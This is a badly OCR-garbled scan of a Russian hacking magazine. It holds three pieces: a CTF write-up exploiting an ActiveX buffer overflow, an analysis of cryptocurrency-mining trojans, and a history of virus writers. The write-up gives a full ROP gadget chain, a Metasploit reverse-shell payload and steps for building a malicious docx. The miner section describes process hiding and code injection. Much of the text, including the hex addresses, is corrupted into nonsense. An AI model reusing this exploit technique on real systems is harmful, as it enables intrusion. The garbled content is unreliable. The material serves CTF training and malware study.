В-(0 (15,1195) СОЫТЕХТ 5РЕС1Ғ1С (0) 
В-^ 1 (19,1191) 5ЕОДЕЫСЕ 

јк| (23,1) 1ЫТЕ5ЕК : '0 1 
§ (26,1091) 5ЕТ 
В-Т^ (30,1037) 5Е01ТЕЫСЕ 

| |ЈЈГ| (34,1) 1ЫТЕ5ЕГЧ : '0' 

(37,39) 5ЕОЈЈЕЫСЕ 
\=\-^ (39,19) 5Е01ТЕЫСЕ 
ГВ-[§ (41г17) 5ЕТ 

В-Т^Ј 3 (43,15) 5Е£ТЈЕЫСЕ 

О (45,3) ОВ0ЕСТ 1ЕЕМТ1Ғ1ЕК 
§ (50,3) РК1ЫТАВ1јЕ 5ТЕ1Ы6 : 



ссиптопЫате : Т 2 . 5 . 4 . 3 ' 
'ЫеоО^езЕ' 



(60,16) ТЫТ Е5ЕК : 1 9 В£ 9 БЗ Е7 9 1 9 6ВЗА6 4 4 9АЗ 5АЕ7 СВ37А2 3 



А5Ы.1 третвего 
блока 



ЕХР 1.0 1ТАТ1 0 N 

Переидем кәксплуатаи,ииу^звимости. В про1дессе\Л/1Ы\/\/ОВО.ехе вклкзчен регплапепт,- 
ОЕР и А51_В. Лишв дгш одного модул^ А51_В отклкзчен — ЫеоОиезтЈАстјуеХ.сШ. Дл^ об- 
хода приведенных ограничении необходимо переполнитв буфер, перезаписав адрес 
возврата, которыи, в свок) очередв, будет^вл^твс^ первым ВОР-гаджетом в програм- 
ме. В резулвтате выполнени^ ВОР-программы пам^тв с шелл-кодом (стек) должна 
статв исполн^емои, и мы переидем к исполненикз шелл-кода. 



ВоҒ јп 31аск 

Не будем вдаватвс^ в подробности и тонкости переполнени^ стекового буфера. Ска- 
жем просто, что дл^ того, чтобы переписатв адрес возврата адресом 0x09090909, 
необходимо сформироватв следукзшукз строку в һех-редакторе: 
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г\г\ 

09 


г\г\ 

09 















Напомним, что первые два баита — длина строки, далее следует сама строка. В у^з- 
вимыи сеттер Епсгур1:ес1Тех1:В1оо подаетс^ әта строка, закодированна^ в Вазе64. 
Выгл^детв она будет следугоидим образом: АСдАААААА0ЕВА01САд10А\л/М0ВА0ЕВА 
11ҒВ01ЈӨВдҮӨВ\л/сНВ\л/д1САдЈС0кЈ. При әтом приложение будет «валитвс^» с такои 
ошибкои (дгт отладки нами было ранее написано тестовое приложение, вызывакз- 
идее сеттер у^звимого своиства и передакзидее в него заданныи параметр): 

Ипһапс11ес1 ехсер-ЕЈоп а"Е 0x09090909 Јп Те51:С0М0рј ес1:.ехе: 0хСӨӨӨӨӨ05: Ассе55 <-«_ 
Ү1о1а"С10п ехеси"сп.п§ 1оса"С10п 0x09090909 . 

Итак, мы умеем переписыватв адрес возврата. Осталосв построитв РОР-и,епочку 
и вместо ничего не значаидих баит 0x0909090 подсунутв первыи гаджет иепочки. 
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НОР-чепочка и полезнал нагрузка 

Дл^ упроидени^ построени^ РОР-программы восполвзуемсл 1плтипЈ1:у Оеоиддег'ом 
и скриптом на РуШоп топа.ру. Запустив топа.ру, получаем примернукз РОР-и,епочку. 
В зтои иепочке не хватает одного РОР-гаджета и вообиде в и,елом не все гладко, позто- 
му ее придетс^ немного модифии,ироватв. Не будем приводитв РОР-иепочку, котора^ 
была получена в резулвтате выполнени^ плопа.ру, а приведем сразу итоговукз: 

0Х2ӨӨӨ462-Ғ , # РОР ЕВР # КЕТ М [ №оО_ие51:Ас1:пл/еХ . с111 ] 

0Х2ӨӨӨ462-Ғ , # 5кјр 4 ру1:е5 [ |\1еоОЈЈе5±А сиуеХ^1 1] 

0х2ӨӨӨс6сҺј # РОР ЕВ Х # КЕТ М [Мео(јие51:А с1:ЈуеХ. с11 1] 

ӨхӨӨӨӨӨӨ4Өј # ӨхӨӨӨӨӨӨ4 Ө-> Е РХ 

Өх2ӨӨӨ-ҒӨс19, # МОУ ЕРХ^ЕВХ # М0У ЕВХ^ЕСХ # М0У ЕСХ, ЕАХ # М ОУ ЕАХ, Е51 # РОР <^ 

ССТ # ОСТМ С1у1С1 ГМопПиос-НЛ/-һ-1иаҮ /4111 



0x41414141, 


1 

# 


> ј_ тг 1 \ 1_ 1 1ч 1/л±1/ |_ исиуисЈ «_ЛЛ«_ »_ Ј. V сл ■ и±± Ј 

ҒШег (сошреп^а^е) 


0х2ӨӨ0с67һ ј 


# 


РОР ЕВХ # КЕТЫ [Мео<гие5*Ас*1УеХ.с111] 


0x41414141^ 


# 


ҒШег (КЕТМ о-Ғ-Ғ5е"С сотреп5а"1:10п) 


0x41414141^ 


# 


N Г Т — 

ҒШег (КЕТМ о-Ғ-Ғзе - !: сотреп5а!:10п) 


0x41414141^ 


# 


\ Г X 

ҒШег (КЕТМ о-Ғ-Ғ5е"С сотреп5аГ10п) 


0x41414141, 


# 


\ Г X 

ҒШег (КЕТМ о-Ғ-Ғ5ет сотреп5аГ10п) 


0x00000201, 


# 


0x00000201 -> ЕВХ 


^ — 

0х200115е9^ 


# 


РОР ЕСХ # КЕТМ [Меодие5ГАсГ1ҮеХ.с111] 


0х2002294а^ 


# 


1. ^ Ј 

&1л1гИ:аЫе 1осаГ10п [Меорие5ГАсГ1ҮеХ.с111] 


0х2000с0с9, 


# 


РОР Е01 # КЕТМ [Мео<гие5*Ас*1УеХ.с111] 


Ј 

0х2000с1еЗ. 


# 


1. — Ј 

КЕТМ (КОР 1М0Р) [Меодие5ГАсТ1УеХ.с111] 


Ј 

0x2000462^ 


# 


\ / к. — Ј 

РОР ЕВР # КЕТЫ [Мео^иез-сАс-ЫүеХ.сШ] 


Ј 

0x2000462^ 


# 


1. — Ј 

РОР ЕВР # КЕТЫ [Меодие5ГАсГ1ҮеХ.с111] 



0х20012с97, # РОР ЕАХ # РОР Е51 #^ЕТЈ\1 [Мео<2ие5*Ас*лл/еХ. с111] 

0x20016164, # ргг го &УЈггиа1Ргогесг() [1АТ Меодие5*Ас_1үеХ . с111 ] 

0x20000706 , # ЗМР [Е АХ] [Мео<2ие5*Ас*:лл/еХ.с111] 

0Х20ӨӨ17 Һ-Ғ, # Р115НА Р # КЕ ТИ [Меодие5ТАсГ1УеХ.Ж1Ј 

0x20001574 , # ргг го 'јтр е5р' [№о<2ие51:Ас1:лл/еХ. с111 ] 



Сразу после згого следует рау1оа<± В качестве полезнои нагрузки мы исполвзуем 
5һе11_геуег5е_"сср (подходит толвко он, потому что на сервере все порты филвтру- 
кзтс^ и открыт толвко 80-и порт), при зтом необходимо иметв внешнии 1Р-адрес или 
исполвзоватвхостинг. Генерируем полезнукз нагрузкус помоидыотогоже Ме1а8р1оН'а. 

Формирование «вредоносного» документа 

Чтобы сформироватв вредоносныи документ дгш выполнени^ собственного кода 
на удаленнои машине, нужно выполнитв его формирование вручнукз. Әто необходи- 
мо из-за того, что при задании своиства АсИуеХ-әлемента документа в режиме раз- 
работчика происходит вызов у^звимого сеттера с последукзидим исполнением по- 
лезнои нагрузки. Таким образом, \Л/огс! не сохран^ет своиство в фаиле, посколвку 
нарушаетс^ ход его выполнени^. 

Дл^ прохождени^ задани^ нужно распаковатв документ как 21Р-архив, наити 
своиство в фаиле ас1:меХ1 .Ып. Там оно тоже представлено в виде 11пЈсос!е-строки, 
в начале которои идет ее длина (тип В5ТВ). После замены своиства на вредоносное 
запаковываем фаилы в 21Р-архив и мен^ем расширение на с!осх. 

При загрузке сформированного документа на сервер получаем «отстук» полез- 
нои нагрузки в консолв Ме1а8р1оН'а. Делаем листинг директории и видим искомыи 
сертификат. Скачиваем сертификат и паролв на него, устанавливаем в свое хранили- 
ше сертификатов и открываем документ ЫеоОиезЈОосиплепЈ.сЈосх, в котором теперв 
уже еств клкзч прохождени^ задани^. 

ЗАКЛКЗЧЕНИЕ 

Задание про «фалвшивыи иитрус» прошел толвко победителв тура АУ1сШг, но даже 
он не смог отменитв запуск ракеты (которукз, по легенде, он неча^нно отправил не- 
пон^тно куда). Что ж, у него и у осталвных участников будет шанс все исправитв. Они 
встрет^тс^ 3 иголл в Петербурге на очном туре ЫеоО11Е5Т-2014, чтобы наконеи, оста- 



новитв әту случаино запуиденнукз ракету! 



Взлом 





Дмитрии «01д1 » Евдокимов, 

ОЈдИа! 5есип1у 

@еус!окЈтоус15 



Сергеи «Ве1лше» Белов, 

0\д'Аа\ 5есип1у 

@зегаеуһе1оуе 




СОФТ ДЛ^ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ 




ША1ШШС 



Внимание! Информаии^ 

представлена 
искгиочителвно с иелыо 
ознакомлени^! Ни авторы, 

ни редакиЈ/тзатвои 
деистви^ ответственности 
не несут! 




ВСКРЫВАЕМ МАЛВАРҺ 

ДЛЛ НЕСАНКи,ИОНИРОВАННОИ 

ДОБЫЧИ КРИПТОВАЛНОТЫ 



Растушдл попугтрноств битка и его раз- 
ноликих форков (1Лвсо1П, Рго1оЗһагез, 
РпглесоЈп и прочих) привела к полвленинз 
вредоносных программ длл их добычи, 
а активноств вирмеикеров в әтом направ- 
лении стала уже своего рода моднои тен- 
денииеи последнего времени. Нам в руки Евгениид Р обот У н 

(ЈгоһоШпШакер.ш 

попало несколвко образиов такого рода 
программ, и мы решили посмотретв, что же 
у них внутри. 




НЕБОЛВШОЕ ВСТУПЛЕНИЕ 

Как бы ни была крута тво^ рабоча^ машина, кака^ бы моидна^ на неи ни сто^ла ви- 
дкзха и сколвко бы ^дер ни содержал твои проиессор, в наше врем^ маинитв на неи 
уже бесполезно. Те, кто не имеет лишних денег на покупку модного асика (устрои- 
ство на основе спеи,иализированных проиессоров, которое, кроме маининга бит- 
коинов, болыие ничего не умеет) или хот^ бы фермы из дес^тка-другого мошных 
видеокарт, обБедин^кзтс^ в пулы дл^ совместного добывани^ әлектронных денег, 
которые потом по-братски дел^тс^ между участниками пула. 

Главна^ задача программы дл^ несанки,ионированного маининга — незаметно 
дл^ ничего не подозревакзшего полызовател^ заставитв его компыотер работатв 
на какои-нибудв пул под учетнои записыо создател^ зтои программы. Чем таких 
незадачливых полызователеи будет болвше, тем болвше криптомонет упадет в ко- 
шелек злоумышленника. 
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Привет, Гостһ' Е-оидите или Јзарегистрируитесһ . 

* Форум озаработке в интернете » Заработок и работа в сети инт&рнет »■ Продам ВКсош-маининг 
тролна 



Странии,а: 1 



Продам ВИсош-маннинг тронна 



даај&у 

Новичок 

Зарегистрирован: 2013-10-31 
Приглашении : 0 
Сообтении: 3 
Уважение : [ + 0/-0] 
Позитив : [+0/-0] 



2013-10-31 11:42:00 

Продага ЕИтсот-маининг тролна. На сегоднншнии момент не детектитси 
антивирусами. Распространлетсл по ИЗВ-накопителдм, сетевым дискам, Огорс-ох:, 
ҮапскхРЈ&к. 

Троин компилируетсд индивидуалһна под ваш маининг-пулл. Работает со всеми 
пулами. Автоматически распознает, на чем маинитһ (СР1Ј или СР1Ј). Естһ 
возможностһ конфигураиии таким образом, что маининг-пулл не определит, что 
маининг ведетса ботнетом. 

Стоимостһ от 1.5 ВТС (базоваи версид) и более, в зависимости от желаемого 



Рис. 1. Об^авление о продаже маинера на одном из форумов 



Ш5КТ001.ШШ32.В1ТСОШМШЕП.МПА 
И Ш8КТ001..ОТШ32.В1ТСОШМШЕП.МПР 

Оба әтих образиа, скорее всего, вышли из-под пера одного и того же создател^. Ра- 
ботакзт на пуле уроо1.пе1, ориентированы на маининг РгоЈоЗһагез на некое лии,о (или 
группу ли1д) с учетнои записыо на пуле плузИсаИ . 

Оба образиа сжаты с помоидыо 11РХ и распаковывакзтс^ без вс^ких проблем. 
Болвша^ частв кода у того и другого образиа одинакова^ и аналогична коду легалв- 
ного маинера јһРгоЈогтппег. Основное отличие от јһРго1:опгппег'а заклночаетс^ в зада- 
нии параметров запуска не из команднои строки, а непосредственно из тела про- 
граммы. 
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— N6^5 С1те11пе 

Ө ХРМ Еһаге уа1иеЕ & с1еүе!орег төе - 
2014-01-13 

АИ рлтесот ЈгЈаге уа1ие5 «еге ирсЈЕгсес! та кеер т1п№£ Ш 
РМ9П млгһ д һјрһрг прпыпгк гЈЈГпгШгу. ТҺр ттмгмт [ј№н1ту 
Тог з РгЈгпесоЈп ^һаге 15 псиаг 7.0 {6.75 рге\л'ои5|у). 
Тг115теап5 Тһаг 5һаге5 ү\л11 ое з1Је;һт1у тоге 5сагсе тгот поүү 



© Ро11: 5һои1с1 оте асЈгЈ зирроп Гог Јгесоһ 
тттд? 



Үе5, 1 үүоиШ пшпе опуроо! 
Үрч, һиг I ртһдМу \лггмј|[_ ппт тјпр I ТГ пп урпп1 
■ N0, Тһегеага а1гвәсЈу епои^һ 1_ТСроо1_ 
_ ■ I сЈогГ.саге /I ат оп1у ЈпсегеЕгас! Јп СР1Ј тјг_л§ 



Рис. 2. \лш\л/.уроо1.пе1 



Первыи образеи (попал ко мне в виде фаила рЈз.ехе) не предпринимает ника- 
ких мер дгт сокрыти^ своего работакзидего проиесса в системе и прекрасно виден 
в диспетчере задач, которыи показывает загрузку проиессора, близкукз к 100%. 

После запуска рЈз.ехе подклкзчаетс^ к пулу, передает им^ учетнои записи, им^ 
воркера и паролв воркера на уроо1.пе1: и приступает к добыче әлектронных денег. 
Как уже говорилосв, им^ учетнои записи — плузИсаИ , а в качестве воркера в данном 
случае исполвзуетс^ воркер, создаваемыи по умолчаниһо, — р1з с паролем х. Вор- 
кер — зто рабочии поток, непосредственно выполн^кзидии вычислени^. Дл^ однои 
учетнои записи воркеров может бытв несколвко, и осуидествл^тв своһо де^телвноств 
они при әтом будут параллелвно. 



; в Диспетчер задач \ҮшсЈои/$ 
Фаил Параметры Вид Справҝа 
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Описание 


сзгзз.ехе 


400 




00 


956 КБ 
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Дроботун 
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1 188 КБ 


МгҺјзШх Сие$* Д 


'лјЫосјоп.ехе 
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00 
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Отображатһ проиессы всех полһзователеИ 



ЗаЕершитһ проиесс 



Про^ессов: 30 Загрузка 1ДП: 100% Физическап лаылты 30% 




шғо 

Кстати, асик-маинер Ғаз1- 
Назһ Опе Р1а1тит ЕгЈШоп 

ВҺхот МЈпЈпд Масһте 
потребл^ет20 кВ/ч, имеет 

вычислителвнук) мо1Д- 
ноств чутв менее 25 ТН/з 
и стоит388 997долларов. 
Говорлт, мес^иазачетыре 
окупитс^. 



Рис. А. Передача имени учетнои записи, имени воркера и парол^ на пул 

Второи образеи, (х86.ехе) чутв более сложныи. Во-первых, с помоидыо АР1-функ- 
|дии 5еЖегпе10ојес1:5есип1:у он делает свои проиесс неубиваемым (причем даже 
РгосеззНакег с его семнадиатыо способами остановки проиесса не в состо^нии 
с ним справитвс^). 

Во-вторых, х86.ехе запускает внутри себ^ еиде один поток, которыи каждуко се- 
кунду с помоидыо Сгеат_еТоо1һе1р325пар5һо1: получает список запуиденных в системе 
про1дессов и провер^ет его на наличие проиесса 1:а5кплдг.ехе. При обнаружении зго- 
го про1десса маинер с помоидыо известнои всем вирусописател^м последователв- 
ности АР1-функ1дии ОрепРгосе55, \/Уг1Т.еРгосе55Метогу и Сгеат_еВеплот_еТһгеас1 инжек- 
тит в т_а5кплдг.ехе код, перехватывакоидии функ1дигО Ы1:Оиегу5у51:ет1птогпг1атЈоп. 



Саритпд ггот Подклгочение по локалһноИ сети [ШЈгееһагк 1.10.4 Кеү 54184 тгопл Дг... 
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Рис. 3. РЈ5кТоо1.\Л/Јп32.ВЈ1СоЈпМЈпег.тга в диспетчере задач 

Благодар^ әтому перехвату маинер убирает название своего прои,есса из дис- 
петчера задач, скрыва^ свое присутствие в системе. 

В осталвном второи образеи, функи,ионирует аналогично первому, за исклкзчени- 
ем имени воркера. В зтом случае исполвзуетс^ им^ воркера Ипих. 



В «\ X 



иЈ Ҹ +! *: Ј| ^и] һ 



Е М 



н 



ӨӨ4Ө14ВВ 
00431460 
ӨӨ4814СӨ 
Ө94Ө14С1 
09481 4СЗ 
894Ө14С4 
Ө84814СД 
084Ө14СВ 
08481401 
88481404 
ӨВ4Ө140Б 
88481 40€> 
08481408 
89481409 
08481 40Е 
094814ЕӨ 
08481 4Е1 



52 
ҒҒРЗ 
3045 ОС 




РУ5Н ЕОХ 
СДШ ЕВХ 

гах..|_осп1_.9. 



84094181 



ҒҒ15 70Н9410 
8В40 ҒС 
5Ғ 
5Е 

ЗЗСО 
5В 

ЕЗ 1НВ089Ө8 

ЗВЕ5 

50 

СЗ 

_СС 



н 

РУЗН 4 
РивН Е01 

СДИ. ОМСМ) РЈН 08 : С < &Р0М0Р1 32 . 5е*Кег п е 1 0Һ> ј ес*8еси г[«у>] 

П5> 



р1н штттшғпгж^п 

М00 ЕОС0Ш0Р0 РТР 35: [1ЈХД1-Л ] 

РОР Е01 

РСҒ Е31 

ХОР ЕСХрЕВР 

РСР ЕВХ 

СШ. 98490 1ҒЗ 

П00 Е5Р.ЕВР 

РОР ЕВР 

РЕТН 

ТМТ^: 




Рис. 5. Вызов 5еЖегпе10ојес15есип1у в х86.ехе 
ТПОЈАЫ-ПАЫ80МЛУШ32.В1.0СКЕП.ОЈ8Ј 

Әто творение лкзбителеи легкои наживы написано на УВ, ничем не упаковано и пред- 
ставл^ет собои фаил по имени \л/пл1т.с.ехе. 

При более близком знакомстве вы^снилосв, что в секи,ии ресурсов фаила лежит 
запароленныи самораспаковывакзидиис^ архив пгппег.ехе, а сам фаил по болвшому 
счету представл^ет собои скрипт, которыи достает из ресурсов архив, распаковы- 
вает его в папку %АррОа1:а%, добавл^ет клкзч автозагрузки в реестр и запускает два 
маинера, которые содержалисв в архиве. 
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Рис. 6. Вотздес_ и пооисходит пеоехват МШиегү5ү51ет 1п^огта^оп 



Все свои деистви^ (распаковку, добавление клкзча в реестр, старт маинеров) 
трсжн выполнтет, запуска^ стс1.ехе с нужными параметрами. 

Добыча криптовалкзты в зтом трсжне осуидествл^етс^ с помоидыо вполне легалв- 
ных маинеров сдгтппег.ехе и пгппегскехе, которые запускакггс^ в скрытом режиме. 
Сдпгппег маинит с исполвзованием видеокарты, а гтппегс. на проиессоре. Оба маи- 
нера работакзт с криптовалкггои Шесо.п и запускакзтс^ дгт работы на пул \л/егтппе11:с. 
сот с именем воркера доотоа.2 и паролем х. 



Избранное 
ј& Загрузки 
^ Недзвмие места 
И Рабочии стол 

|33 Библиотеки 
13 Видео 
13 Документы 
И Изображениа 
Музыкз 



јј§) Компыотер 
% Сетһ 



Имд 



Ш 



1с.еп1:.-.е5 
1п*е1 

Мее1.а Сеп^ег Ргодгәгш 

МЈСГОБ01Т, 

Ргосе55 Наскег 2 
\'УЈге5һагк 



сдттег.ехе 

ПЫалШН 

тЈпегсЈ.ехе 

рһаМ21016.с1 

росШт130302.с1 

р1һгеа«Ј6С2.<Ј11 

5сгурИ30511.с1 



□ 
□ 

□ 



штКс.ехе 
§1 гПЫ.сЈИ 



Рис. 7. Содержимоеархива. 
Два маинера сдттег.ехе, 
ттегсЈ.ехе и необходимые 
дл^ их работы фаилы 
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Рис. 8. Декомпилированныи кодтро^наТгојап-гап5от.\Л/т32.В1оскег.0Ј5Ј. 
Видна последователһ>ностһзапуска стсј.ехе 
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Рис. 9. Ссылка на погодныи информер с неболышм довеском в виде маинера криптовалкзты 



ТКОЈАЫООШЫ1.0АОЕК.М511..ВГГСОШМШЕК.Т 

Әта программа дл^ несанки,ионированного маининга распростран^етс^ под видом 
краине полезного и нужного приложени^ — погодного информера. 

Тро^н представл^ет собои фаил 5пла11\Л/еа1:һег5е1:ир.ехе, скомпилированныи 
из скрипта на Аитх>11 и оборудованныи весвма симпатичнои и вызываһоыдеи доверие 
иконкои. Если декомпилироватв әтот скрипт, то внутри можно увидетв запуск двух 
фаилов зе1ир_1 .ехе и зе1ир_2.ехе. 

Первыи устанавливает в систему обеыданныи погодныи информер, которыи ра- 
ботает вполне по-честному и исправно показывает температуру, облачноств и про- 
чие погодные аномалии. А вот второи начинает вредоноснуко де^телвноств: устанав- 
ливает св^зв с Ы1сһа1.огд, скачивает оттуда фаил под названием Јпт.е1.ехе, запускает 
его на выполнение и прописывает его в автозагрузку в реестре. 
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Рис. 10. Декомпилированныи скриптна АиЫ1 



И 5еТир_2.ехе, и Јп1е1.ехе написаны на чем-то, что исполвзует технологикз .ЫЕТ 
(об әтом говорит аббревиатура М511_ в названии тро^на), и легко декомпилирукзтс^. 
При әтом в теле 5еТир_2.ехе можно наити строчку с предположителвным именем ав- 
тора зтого творени^ (хот^ кто его знает, может бытв, зто и подстава). 

Запуиденныи и прописанныи в автозагрузку ЈпТеКехе скачивает с ЫТсһаТ.огд 
дл^ себ^ инструки,икз по далвнеишим деистви^м в виде фаила тТо.хпл! и приступа- 
ет к их выполненикз. 
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Рис. 11. Если вспомнитһ>, как кодирукзтс^ русские буквы в (ЈТҒ-8, то здесв можно прочитатв 
им^ предполагаемогоавторатро^на 



Внутри ЈпТо.хт! хорошо видны пул, с которым будет работатв маинер, им^ учет- 
ки и паролв (некто ТопусгаТТ, с паролем Ө4К1_23ҒӨВ), а также последователвноств 
загрузки двух маинеров и необходимых компонентов дл^ их работы. 

Маинеры, как и в предыдушем случае, вполне легалвны, причем, несмотр^ 
на то что было скачано два маинера, дл^ работы запускаетс^ один с именем ехр1огег. 
ехе (очевидно, чтобы сбитв с толку не оченв опытных полвзователеи). Параметры 
запуска ехр1огег.ехе также видны в фаиле ЈпТо.хпл!, а добывает он ЫТесот, исполызу^ 
ресурсы видеокарты. 
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Рис. 12. Кусочек декомпилированного кода тт.е1.ехе. Выделены строки, 
ответственные за загрузку тто.хт! 
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Рис. 13. Инструки,и^ по далвнеишим 
деистви^м (фаил јпто.хт!) 
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Рис. 1Д. Об^емы капитализаиии 12 криптомонет на ^нварв 2014 года 



ЗАКЛ10ЧЕНИЕ 

Хождение различных криптовалкзт на просторах интернета не могло не заинтере- 
соватв лкзбителеи поживитвс^ за чужои счет, и по^вление иелого класса программ 
дгт несанк1дионированного маининга әлектронных монет было ожидаемо. В болв- 
шинстве случаев авторы зтих программ исполвзукзт исходники вполне легалвных 
маинеров и модифии,ирукзт их под свои нужды либо пишут оболочки дл^ их скрытого 
запуска с нужными параметрами. 



Ма1игаге 




БИОГРАФИ^ 

ТОП-10 ОДИОЗНЫХ ВИРМЕИКЕРОВ 




Владимир Трегубенко 

јгесшрепко у у@М.ру 



Когда-то давно дөрөввл были болыиими, а разработка 
вирусов была сродни искусству. Сначала велисв теоре- 
тические изысканил, а потом дело дошло и до практики. 
Подгонлемыи многочисленными вирмеикерами итрол- 
нописател^ми локомотив разработки вредоносного кода 
все силвнее набираетскороств, оставллл за бортом име- 
натех, длл кого разработка малвари была идеологиеи 
жизни. На смену гуру пришли никому не известные лич- 
ности, поставившие производство на поток. В әтом мате- 
риале мы приведем «горлчукз» дес^тку имен из ҮХ-сиены, 
которые до сих пор у всех на слуху. 

Роберт Моррис: Червв с болыиои буквы 

2 но^бр^ 1988 года сетв АВРАЫЕТ (прототип наших интернетов) была атакована про- 
граммои, впоследствии получившеи название «червв Морриса» — по имени его со- 
здател^, студента Корнелызкогоуниверситета РобертаМорриса — младшего. «Червв 
Морриса» был первым в истории развити^ 1Т образиом вредоноснои программы, ко- 
торыи исполвзовал механизмы автоматического распространени^ по сети. Дл^ әто- 
го әксплуатировалисв несколвко у^звимостеи сетевых сервисов, а также некоторые 
слабые места компыотерных систем, обусловленные недостаточным вниманием 
к вопросам безопасности в то врем^. 

По словам Роберта Морриса, которому в 1988-м было 22 года, червв был создан 
в исследователвских идгтх. Его код не содержал в себе никакои «полезнои» нагруз- 
ки (деструктивных функи,ии). Тем не менее из-за допуиденных ошибок в алгоритмах 
работы распространение черв^ спровои,ировало ОоЗ-атаку, когда ӘВМ были зан^ты 
выполнением многочисленных копии черв^ и переставали реагироватв на команды 
операторов. 

По некоторым ои,енкам, червв Морриса инфии,ировал пор^дка 6200 компыоте- 
ров. Сам разработчик, осознав масштабы резулвтатов своего поступка, доброволвно 
сдалс^ власт^м и обо всем рассказал. Слушанве по его делу закончилосв 22 ^нвар^ 
1 990 года. Изначалвно Моррису грозило до п^ти лет л ишени^ свободы и штраф в раз- 
мере 250 тыс^ч долларов. В деиствителвности приговор был достаточно м^гок, суд 
назначил 400 часов обидественных работ, 1 0 тыс^ч долларов штрафа, испытателвныи 
срок в три года и оплату расходов, св^занных с наблкздением за осужденным. 

В 1988 ГОДУ 

НЕБЕЗЫЗВЕСТНЫИ ПИТЕР 

НОРТОН Д0В0ЛВН0 

РЕЗКО ВЫСКАЗАЛСЛ 
ПР0ТИВ Р.АМ0Г0 ФДКТД 




СУ1ДЕСТВ0ВАШ 
КОМПЫОТЕРНЫХ ВИРУСОВ, 
НАЗЫВАЛ ИХ«МИФОМ» 
И СРАВНИВАЛ ШУМ ВОКРУГ 
ЗТОИ ТЕМЫ С «РАССКАЗАМИ 
0 КРОКОДИЛАХ, ЖИВУШИХ 

В КАНАЛИЗАиИИ ныо- 

иорка». всего два 
года спустл вышла 
первал верш мортом 
ашшз... 

Ин1дидент с «червем Морриса» заставил спеииалистов в области 1Т сервезно за- 
думатвс^ о вопросахбезопасности. В частности, именно после зтого дл^ повышени^ 
безопасности системы стало внедр^твс^ исполызование пауз после неправилвного 
ввода парол^ и хранение паролеи в /е{с/5һас1о\л/, куда они перенесены из доступ- 
ного на чтение всем полызовател^м фаила /е{с/ра55\л/с!. Но наиболее важным со- 
бытием стало создание в но^бре 1988 года координаиионного иентра СЕҒГГ (СЕҒГГ 
СоогсПпаИоп СепЈег, СЕҒГГ/СС), де^телвноств которого св^зана с решением проблем 
безопасности в интернете. Первым по^вившимс^ в декабре 1988 года бкзллетенем 
безопасности СЕҒГГстало сообидение обу^звимост^х, исполызованныхчервем. При- 
мечателвно, что многие технические решени^ в «черве Морриса», такие как перебор 
паролеи, компил^ии^ кода загрузчика наудаленнои ӘВМ под управлением *Ы1Х-си- 
стем (51аррег) или сканирование сети дгт вы^влени^ и,елеи, примен^кзтс^ и в совре- 
менных образиах малвари. 

Интересно, что в том же самом 1 988 году небезызвестныи Питер Нортон доволв- 
но резко высказалс^ в печати против самого факта суидествовани^ компыотерных 
вирусов, называ^ их «мифом» и сравнива^ шум вокруг әтои темы с «рассказами 
о крокодилах, живуших в канализаиии Ныо-Иорка». Всего два года спуст^ после за- 
^влени^ Нортона вышла перва^ верси^ 1Чог1:оп АгДМгиз... 

И напоследок — в 1988 году, под впечатлением от атаки черв^ Морриса, аме- 
риканска^ Ассо1диаи,и^ компыотерного оборудовани^ обБ^вила 30 но^бр^ между- 
народным днем зашиты информаиии (Соплри1:ег 5есипт.у Оау), которыи отмечаетс^ 
и по сеи денв. 

Сам Моррис сделал успешнукз научнукз карверу в Массачусетском технологиче- 
ском институте, имеет звание профессора и одно врем^ даже занимал должноств 
главного ученого в Наи,ионалвном иентре компыотернои безопасности США, од- 
ном из подразделении АНБ. В 1995-м он основал сервис \/Ја\л/ео, стартап компании, 
разрабатывакзидеи программное обеспечение дгт создани^ интернет-магазинов. 
\/Ја\л/ео был продан за 48 миллионов долларов Үаһоо, котора^ переименовала его 
в «Үаһоо! 51:оге». В 2008-м отметилс^ выпуском ^зыка Агс — диалекта ^зыка Лисп. 




Оагк Ауепдег 

В начале дев^ностых годов произошел так называемыи «әкспонени,иалвныи вирус- 
ныи взрыв». Количество новыхвирусов дгт М5-005, обнаруживаемыхв мес^и,, стало 
исчиогттыз^ дес^тками, а в далвнеишем и сотн^ми. Әпии,ентром әтого взрыва была 
Болгари^. Почему именно она? Очевидно, әто была перва^ страна сои,иалистическо- 
го лагер^, начавша^ сериино выпускатв 1ВМ РС совместимые компыотеры. Охрана 
авторского права? Не, не слышали. Ответственностыо за несанки,ионированное ко- 
пирование программ никто не заморачивалс^, поәтому чутв менее чем все програм- 
мы были пиратским, что, естественно, краине способствовало распространеникз ви- 
русных әпидемии. Именно Болгари^ спровои,ировала зарождение вируснои си,ены 
как таковои. И одним из наиболее известных анонимусов \/Х-С1дены Болгарии стал 
вирмеикер под псевдонимом Оагк Ауепдег. Его перу принадлежит и,елое семеиство 
вирусов Ес!сПе, обладакзидих деструктивным функи,ионалом, — при каждом 16-м за- 
ражении вирус переписывал случаиныи сектор на диске частыо своего тела. 

Первое упоминание в качестве автора по^вилосв в вирусе Ес!с1Је.1800, содер- 
жашем строку «ТҺЈз ргодгат \л/аз мпНеп јп Ше сг1у оТ 5о1ла (С) 1988-89 Оагк Ауепдег». 
Вирусна^ әпидеми^ ЕсЈсИе не толһко охватила Европу, но и перекинуласв за океан 
в США, что привлекло широкии интерес средств массовои информаиии к персоне 
ОапЧ Ауепдег. Исследователи семеиства вирусов ЕсЈсПе отмечали высокии профес- 
сионализм автора, а также его т^гу к красивым программным решени^м. В качестве 
примера можно привести выравнивание текстовыми строками длины тел различных 
версии вируса до значении, кратныхста, — 1800, 2000, 2100. ОагкАуепдег известен 
также как разработчик первого полиморфного генератора дгт вирусов в среде М5- 

005 — М1Е (МиЈаИоп Епдјпе), которыи был выпушен в 1991 году в виде об^ектного 
модул^ с подробнои инструкииеи по примененикз. Данныи движок иногда ошибоч- 
но называкзт ОАМЕ — Оагк Ауепдег МиЈа^оп Епдјпе, тогда как ОАМЕ — Оагк АпдеГз 
МиШр1е Епсгур1:ог — движок, выпуиденныи в 1993 году командои канадских вирмеике- 
ров Рһа1соп/5кЈ51П. 

По некоторым признакам Оагк Ауепдег — ^рыи фанат музыки в стиле һеауу те1а1. 

06 әтом свидетелвствует строка «Ес!сПе Иуез... зоплемһеге т Ите», тут Ес1с1Је — от- 
сылка к маскоту группы 1гоп МаЈс!еп (5опле\л/һеге т ТЈте — название их шестого 
алвбома). Также в одном из своих немногочисленных интервыо журналистке Саре 
Гордон Оагк Ауепдег упом^нул, что его псевдоним выбран в честв однои старои 
песни — по всеи видимости, композииии группы Мапо\л/аг, котора^ так и называет- 
с^ — Оагк Ауепдег. 

